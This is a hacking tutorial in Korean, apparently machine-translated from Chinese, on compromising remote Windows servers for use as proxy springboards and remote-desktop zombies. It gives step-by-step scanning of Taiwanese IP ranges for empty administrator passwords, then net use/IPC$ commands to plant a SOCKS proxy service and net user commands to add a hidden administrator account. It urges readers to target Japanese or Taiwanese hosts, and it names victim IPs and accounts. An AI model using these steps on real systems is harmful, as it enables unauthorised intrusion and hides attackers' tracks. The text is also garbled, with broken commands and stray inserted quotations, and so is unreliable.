특별 알림: 국내 호스트가되지 마십시오! 일본이나 아평 (대만) 을 만들어라. 이렇게 하면 우리나라의 법률을 위반하지 않고 자신의 애국심도 드러낼 수 있다. 하하 (남의 말을 발췌하는 것) 하지만 성실하게 발판을 만드는 것이 좋다. 항상 무슨 나쁜 일을 할 생각을 하지 않는 것이 좋다. 국내 호스트로 실험을 하지 마세요. 그렇지 않으면 문장 경찰이 당신을 데리러 올 때까지 기다리세요. 대리 발판을 만드는 방법 설명: (1) 이 영화는 제가 직접 발판을 만드는 경험이며, 한번도 발판을 만들어 본 적이 없는 네티즌에게 보여 주는 것입니다. 발판을 만든 네티즌은 볼 필요가 없다. (2) 이 글은 발판을 만드는 가장 간단하고 기초적인 방법을 다룬다. 초보자에게 아이디어를 제공하는 것뿐이다. 유니코드, CGI 등과 같은 좀 더 복잡한 방법들은 여기서 말하지 않는다. (알버트 아인슈타인, Northern Exposure (미국 TV 드라마), 스포츠명언) (3) 발판을 만드는 것은 일종의 침략 행위이므로, 발판과 육계가 있으면 꼭 써야 할 곳에 써야지, 일부러' 블랙' 을 하지 마라! ! 준비 작업: 한 가지 일을 하려면 최소한 두 가지 방면의 준비 작업이 필요합니다. 관련 기초 지식과 이 일을 하는 도구입니다. 기본 도구: (1) X-스캔 V1.3: 강력한 취약성 검사 도구로 초보자에게 매우 좋은 도구입니다. 우리는 주로 그를 이용하여 몇 가지 기본적인 허점 (주로 NT 약한 비밀번호) 을 스캔했는데, 용법은 뒤에서 구체적으로 말할 것이다. (사실 유광은 좋지만, 유광이 NT 약한 비밀번호를 다시 스캔하는 것은 너무 귀찮은 것 같아요.) (2)superscan: 매우 빠른 포트 스캔 도구로, 한 IP 도메인의 IP 분포를 짧은 시간 안에 발견할 수 있습니다. 왜 그를 사용합니까? 주로 맹목적인 스캔을 피하고 효율성을 높이는 것이다. 한 IP 도메인의 IP 주소 분포는 연속적이지 않다. 아마도 그는 xxx.xxx.0.0-xxx.xxx.50.255 의 각 IP 에 컴퓨터가 있는 반면, Xxx.xxx.51.0- 이 단락에 호스트가 전혀 없다는 것을 미리 모른다면, 스캔하는 데 오랜 시간이 걸리더라도 결과가 없고 시간과 돈을 낭비할 수 없다. (3)fluxay 4.0: 대상 호스트에 연결하고 사용자 추가, 원격 시작 서비스 등을 위해 NT 파이프 명령 기능을 주로 사용하는 유명한 스캔 도구입니다. 참고: fluxay 버전 4.0 이 가장 좋습니다. (4)windows2000 의 C: \ 명령 프롬프트 도구: 즉, 발판 제작은 최소한 windows2000 이상의 운영 체제에서 이루어져야 합니다. (5) sksockserver.exe: 발판의 주인공은 원격 호스트의 socks5 에이전트 기능을 구현하는 데 사용됩니다. (6) 글로벌 IP 주소 할당표: 이는 고수에게 불필요하다. 그의 목적은 이전에 발판을 만들어 본 적이 없는 많은 네티즌이 IP 분포에 대해 잘 알지 못하는 것을 감안하기 위한 것이다. 우리의 주요 목표는 외국의 호스트이기 때문에 외국의 IP 분포에 대해 약간의 이해를 하는 것이 중요하다. 앞으로 우리가 스캔할 IP 도메인을 선정하는 주된 근거이기도 하다. (알버트 아인슈타인, Northern Exposure (미국 TV 드라마), 성공명언) 이렇게 하면 더 이상' 추적' 소프트웨어로 IP 의 실제 위치를 찾지 않아도 된다. 도구 준비가 다 되었으니, 이제 발판을 만드는 대략적인 과정을 알아보자. 참고: 방금 다운로드한 이 동동들은 당신의 하드 드라이브에 있지 않습니다! 어디에 두나요? 육계 위에 올려! 우리가 발판을 만드는 과정은 육계에서 이루어진다는 뜻이다. 명사는 육계를 설명한다: 육계는 3389 포트 마이크로소프트 터미널 서비스 (Microsoft terminal service) 를 열었고, 약한 비밀번호가 있는 고속 서버로, 흔히' 육계' 라고 불린다. 우리가 육계에서 해야 하는 것은 안전상의 이유로, 발판을 만드는 것은 결국 일종의 불법 침입 행위이기 때문에, 우리는 자신의 종적을 숨겨야 한다. 물론 육계를 쓰지 않아도 된다. 만약 네가 충분한 대역폭을 가지고 있고 공안이 너를 찾아 귀찮게 하는 것을 두려워하지 않는다면. (물론 육계 자체에 들어가는 것도 불법 침입이다.) Mstsc.exe 라는 소프트웨어를 사용하여 육계에 접속하면 평소처럼 컴퓨터로 원격 서버 (즉 육계) 를 마우스로 제어할 수 있습니다.
과정: 서술의 편의를 위해, 먼저 우리가 이미 육계를 가지고 있다고 가정합시다. 다음 단계는 특별한 지침이 없는 것은 모두' 육계' 에서 완성한 것이다. (1) 먼저 자신의 시스템에서 글로벌 IP 주소 할당표를 열고, IP 영역 (2) 육계에 접속하고, 방금 말한 도구를 육계에서 다운받으면 육계 자신의 IE 로 다운로드하면 된다. (3) 주요 프로세스는 먼저 superscan 을 사용하여 (1) 선택한 IP 영역을 스캔하여 IP 집중된 영역 중 하나를 찾은 다음 x-scan 에 넣어 취약점 검사를 하는 것입니다 이런 식으로 발판이 준비되었습니다. 우리 함께 실천하고 발판을 만들자. (1) 아까 말했듯이, 육계 없이는 발판을 만들 수 없다. 특히 전화접속 인터넷을 하는 네티즌은 (속도가 느리다). 우리는 먼저 이미 알고 있는 육계: xxx.xxx.xxx.xxx 에 로그인했다. 아까 언급한 동동을 모두 준비해 주세요. 우리가 사용하기 쉽도록 집중하는 것이 가장 좋다. 여기저기 함부로 놓지 마라, 그렇지 않으면 주인이 들어오자마자 누군가가 그의 기계에 들어왔다는 것을 알게 된다. (2) 우리는 210.85.0.0-210.85.50.255 의 IP (대만) 를 선택하여 superscan 안에 넣고 superscan 의 포트 설정을 80 개의 포트로만 변경하고 이때 아래의 출력 상자 안에 대량의 활성 IP 가 나타납니다. 보이십니까? (* 역주: 역주: 역주: 역주: 역주: 역주: 역주: 역주) 210.85.0.0-210.85.40.255 이 단락은 모두 활성 IP 입니다. 이제 우리는 무작위로 IP 영역을 선택합니다. 예를 들어 210.85.0.0-210.85.5.255 를 선택합니다. 너무 길지 마십시오. 다음 단계에서는 X-스캔, X-스캔 속도 및 X-scan 사용 방법 여기서 해야 할 일은' 설정' 메뉴에서' 스캔 모듈',' 오픈 포트' 및' NT 약한 암호' 옵션을 먼저 선택하고' 스캔 매개변수' 에 방금 선택한 것을 기입하는 것이다. 그런 다음 검색을 시작합니다. 약 8 ~ 9 분 정도 걸립니다. (x-scan 은 간단하지만 속도가 느리기 때문입니다.) 이 시간 동안 자신의 다른 일을 할 수 있습니다. 시간이 거의 다 되면 x-scan 의 결과를 다시 한 번 보세요. 네, N 개 기계의 비밀번호가 비어 있습니다. 하지만 x-scan 은 약간의 오보가 있으니, 모두 인내심을 가지고 시험해 보아야 합니다! (3) 우리는 210.85.0.14:administrator null 과 같이 중간에서 마음대로 하나를 골랐다. 다음 일은 그것이 도대체 우리의 연결을 받아들이는지, 비밀번호가 맞는지 확인하는 것이다. 이제 유광을 사용하고, 유광을 켜고, "도구" 에서 "NT 파이프 원격 명령" 을 선택하고, 대화 상자를 표시하고, 방금 IP, 사용자 이름, 비밀번호를 채우고, 다시 돌아옵니다. 인터페이스에서 "ntcmd gt;" 를 클릭합니다 프롬프트 뒤에 cmd 를 넣으면 연결이 성공하고 화면에 "c: \ winnt \ system32gt;" 가 나타납니다 의 프롬프트. 이것은 아까 아이디와 비밀번호가 정확하다는 것을 증명한다. 이 기계는 이미 기본적으로 너의 것이다.
좋아, 들어가자, 우리가 무엇을 해야 할지 생각해 보자. 참, 발판을 만드는 것입니다. sksockserver.exe 를 210.85.0.14 에 올려야 서비스를 시작할 수 있습니다. 이 기계를 발판으로 사용할 수 있습니다! 이 동동을 어떻게 올려놓을까: 육계에서 CMD 를 꺼내고, 명령 프롬프트에서 c: \ netuse \ \ 210.85.0.14 \ IPC $ ""/user: "admir Copy c: \ sksockserver.exe \ \ 210.85.0.14 \ admin $ 시스템 팁: 파일을 성공적으로 복사했습니다. 그래서 우리는 sksockserver.exe 를 대상 호스트에 성공적으로 전달했습니다. 다음 임무는 그를 원격으로 시작하는 것이다. 방금 유광 한 NTCMD 로 돌아가서 프롬프트에서 다음과 같이 합니다. C: \ Sksockserver–install 시스템 프롬프트: Snake Sock Proxy Service installed C: \ Sksockserver: 여기서 1949 는 임의로 선택한 것) 시스템 팁: the port value have set to 1949c: \ sksockserver–config starttype 2 시스템 팁: the starttype have set to 2- 이때 이 기계는 이미 너의 발판이 되었다. 다음은 육계를 찾는 방법에 대해 간단히 말해 보겠습니다. 도구: (1)sockscap: 강력한 socks 에이전트 스케줄링 소프트웨어. (2)snake 의 에이전트 스프링 보드 GUI (그래픽 인터페이스 프로그램) (3)mstsc: Microsoft terminal service 터미널 서비스용 클라이언트 프로그램. 3389 육계에 상륙하는 데 쓰인다. 이를 통해 우리는 자신의 기계처럼 터미널 서버를 제어하고 우리의 일을 할 수 있다. 사실 앞의 두 개는 모두 부속 도구이다. mstsc 만이 진짜 주인공을 부르는 것이다. Sockscap 와 sksockserver GUI 를 함께 사용하여 발판을 사용하면 침입 흔적을 숨길 수 있습니다. 우리는 아직 육계가 없다. 그러면 모든 일은 우리 자신의 기계에서만 할 수 있다. 만약 네가 안심하지 않으면 피시방에 가서 다음과 같은 일을 할 수 있다. 그러나, 국내 호스트가 되지 말라는 것을 상기시켜야 한다! 일본이나 아평 (대만) 을 만들어라. 이렇게 하면 우리나라의 법률을 위반하지 않고 자신의 애국심도 드러낼 수 있다. 하하 (남의 말을 발췌하는 것) 하지만 성실하게 발판을 만드는 것이 좋다. 항상 무슨 나쁜 일을 할 생각을 하지 않는 것이 좋다. 단계는 실제로 발판을 만드는 것과 매우 유사합니다. 방금 x-scan 검색 포트에 3389 를 설치했는데, 만약 한 대의 기계가 3389 포트를 열고 약한 비밀번호를 가지고 있다면, 이런 기계는 이른바' 육계' 라고 할 수 있다. (알버트 아인슈타인, Northern Exposure (미국 TV 드라마), 컴퓨터명언) (물론 입력법 허점은 때때로 육계로 만들 수 있지만, 결국 지금은 입력기 허점이 있는 기계가 너무 적어 약한 비밀번호가 있는 터미널 서버보다 훨씬 적기 때문에 후자를 선택했고, 입력기 허점은 국내 기계에만 적합하다. 하나씩 시험해 보는 것은 정말 시간 낭비이다! 귀찮아 죽을 거예요. ) 구체적인 검색 과정은 아까 발판을 만드는 것과 같습니다. 3389 포트 서비스를 열었고 약한 비밀번호가 있는 기계를 찾았습니다. 우리는 위의 검색 결과에서 자세히 살펴본 결과, 마침내 한 대: 210.85.2.84:frank41: 비어 있는 것을 발견했다. 그리고 3389 서비스를 시작했습니다.
이 기계를 자신의 기계로 바꾸려면 반드시 자신의 로그인 이름이 있어야 한다. 그렇지 않으면 매번 다른 사람을 사용할 때마다 어떻게 자신의 기계라고 부를 수 있을까? 이제 사용자 이름을 추가하여 자신을 루트 권한으로 승격시키면 우리는 무엇이든 할 수 있다. (데이비드 아셀, Northern Exposure (미국 TV 드라마), 자기관리명언) 유광을 켜고' 도구' 에서' NT 파이프 명령' 을 선택하여 방금 받은 사용자 이름과 비밀번호: frank41: 비어 있습니다. 그런 다음 NTCMD 인터페이스를 입력하고 프롬프트에: CMD 를 입력합니다. 연결이 성공하면 시스템 프롬프트에서 다음과 같이 합니다. c: \ net user admin/add (admin 사용자 추가) c: \ net user admin shonle Net local group administrators admin/add (사용자 admin 을 administrator 또는 administrator 로 승격) 를 통해 우리는 이 시스템에서 루트 권한을 성공적으로 취득하여 아무 일도 할 수 있지만 나쁜 짓은 하지 마라. 다음으로, 우리가 방금 준비한 이 도구들을 사용할 것이다. 인터넷에서 몇 가지 socks 에이전트를 만들고, sockscap 과 sksockserverGUI 를 설정하고, mstsc 아이콘을 sockscap 으로 끌고, mstsc 아이콘을 두 번 클릭하여 방금 찾은 육계 IP: 210.85.2.84 를 채웁니다 성공 후, 우리가 평소 windows2000 에 로그인했을 때와 같은 파란색 인터페이스가 나타납니다. 이 인터페이스에는 방금 추가한 사용자 이름과 비밀번호를 기입하고 캐리지 리턴으로 로그인했습니다. (데이비드 아셀, Northern Exposure (미국 TV 드라마), 성공명언) 로그인이 성공하면 해당 호스트의 그래픽 인터페이스가 나타납니다. 이때 자신의 기계를 조작하는 것처럼 다른 사람의 기계를 조작할 수 있습니다. 지금까지 너는 이미 육계 한 대를 얻었다. 우리가 위에서 한 일을 할 수 있습니다.